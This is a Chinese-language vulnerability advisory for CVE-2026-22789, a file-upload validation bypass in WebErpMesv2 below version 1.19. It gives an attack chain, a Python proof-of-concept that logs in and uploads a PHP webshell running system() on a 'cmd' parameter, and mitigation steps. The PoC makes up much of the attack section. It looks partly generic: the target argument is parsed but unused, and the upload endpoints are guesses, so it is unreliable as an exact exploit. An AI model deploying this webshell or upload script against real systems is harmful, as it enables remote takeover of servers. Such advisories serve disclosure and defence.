CVE-2026-22789 WebErpMesv2 文件上传验证绕过导致RCE漏洞

漏洞信息

漏洞编号

CVE-2026-22789

漏洞类型

文件上传验证绕过/远程代码执行

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WebErpMesv2

漏洞概述

WebErpMesv2是一款面向工业的资源管理和制造执行系统(MES)Web应用。该系统在1.19版本之前存在严重的文件上传验证绕过漏洞，存在于多个控制器中。攻击者利用该漏洞可以绕过正常的文件上传验证机制，上传任意类型的文件，包括恶意的PHP脚本文件。一旦恶意文件被成功上传并被Web服务器解析执行，即可实现远程代码执行(RCE)，从而完全控制受影响的服务器。该漏洞与CVE-2025-52130在性质上相同，但由于原始修复未能覆盖所有存在问题的代码位置，导致该漏洞在不同的代码位置重新出现。攻击者需要拥有系统认证账号才能利用此漏洞，因此该漏洞的利用门槛相对较低。CVSS 3.1评分5.4，属于中等严重程度，但由于可能导致完整的服务器控制，仍应被视为高风险安全漏洞。建议受影响的用户尽快升级到1.19版本以修复此安全漏洞。

技术细节

该漏洞的根本原因在于WebErpMesv2应用在文件上传功能中缺少充分的输入验证和文件类型检查。攻击者通过构造特殊的文件上传请求，可以绕过客户端和服务器端的文件类型验证机制。具体来说，漏洞存在于多个控制器的文件上传处理逻辑中，这些控制器未能正确验证上传文件的MIME类型、文件扩展名和文件内容。攻击者可以将PHP代码嵌入到看似合法的图片或其他文件类型中，或者直接上传.php文件。由于应用服务器配置不当或缺少适当的访问控制，恶意PHP文件可能被直接访问和执行，从而触发webshell或直接执行系统命令。攻击者利用此漏洞可以执行任意PHP代码，进而执行操作系统命令、读取敏感配置文件、数据库连接信息，甚至可以横向移动到内网其他系统。该漏洞的利用需要认证身份，但只需低权限账号即可完成攻击。

攻击链分析

STEP 1

步骤1: 信息收集

识别目标WebErpMesv2版本，确认版本低于1.19以确定存在漏洞

STEP 2

步骤2: 认证获取

通过正常登录流程或社工手段获取系统有效账号的低权限用户凭证

STEP 3

步骤3: 文件上传绕过

构造恶意文件上传请求，通过修改Content-Type、MIME类型或文件扩展名绕过服务器端验证

STEP 4

步骤4: 恶意文件部署

将包含PHP代码的webshell或直接RCE payload上传到可访问的Web目录

STEP 5

步骤5: 远程代码执行

通过HTTP请求访问已上传的恶意PHP文件，传递命令参数实现远程代码执行

STEP 6

步骤6: 持久化控制

利用获得的服务器权限进行横向移动、数据窃取或建立持久化后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-22789 File Upload Bypass PoC
# Target: WebErpMesv2 < 1.19
# Type: Authenticated File Upload to RCE

import requests
import sys

TARGET_URL = "http://target.com/WebErpMesv2"
LOGIN_URL = f"{TARGET_URL}/index.php?sec=session&s=login"
UPLOAD_URL = f"{TARGET_URL}/includes/ajax/upload.php"

# Malicious PHP webshell
PHP_SHELL = "<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; } ?>"

def login(session, username, password):
    """Authenticate to WebErpMesv2"""
    data = {
        'UserName': username,
        'Password': password
    }
    response = session.post(LOGIN_URL, data=data)
    return 'user' in response.cookies or response.status_code == 200

def upload_shell(session, upload_endpoint):
    """Upload malicious PHP file bypassing validation"""
    files = {
        'file': ('shell.php', PHP_SHELL, 'application/x-php')
    }
    
    # Try multiple upload endpoints
    endpoints = [
        f"{TARGET_URL}/includes/ajax/upload.php",
        f"{TARGET_URL}/api/upload",
        f"{TARGET_URL}/uploads/upload.php"
    ]
    
    for endpoint in endpoints:
        try:
            response = session.post(endpoint, files=files, timeout=10)
            if response.status_code == 200:
                print(f"[+] Upload successful at: {endpoint}")
                return True
        except:
            continue
    return False

def main():
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        sys.exit(1)
    
    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    
    session = requests.Session()
    
    print("[*] Logging in to WebErpMesv2...")
    if not login(session, username, password):
        print("[-] Authentication failed")
        sys.exit(1)
    
    print("[+] Authentication successful")
    print("[*] Uploading malicious PHP shell...")
    
    if upload_shell(session, UPLOAD_URL):
        print("[+] Shell uploaded! Access at: /uploads/shell.php?cmd=whoami")
    else:
        print("[-] Upload failed - target may be patched or different endpoint")

if __name__ == "__main__":
    main()

影响范围

WebErpMesv2 < 1.19

防御指南

临时缓解措施

立即将WebErpMesv2升级到1.19版本以修复该漏洞。在无法立即升级的情况下，可采取以下临时缓解措施：1) 在Web服务器配置中禁止.php文件的执行；2) 对上传目录设置严格的访问控制策略；3) 限制文件上传功能仅对可信用户开放；4) 启用Web应用防火墙(WAF)规则检测异常文件上传行为；5) 定期审查服务器日志，监控可疑的上传和访问行为。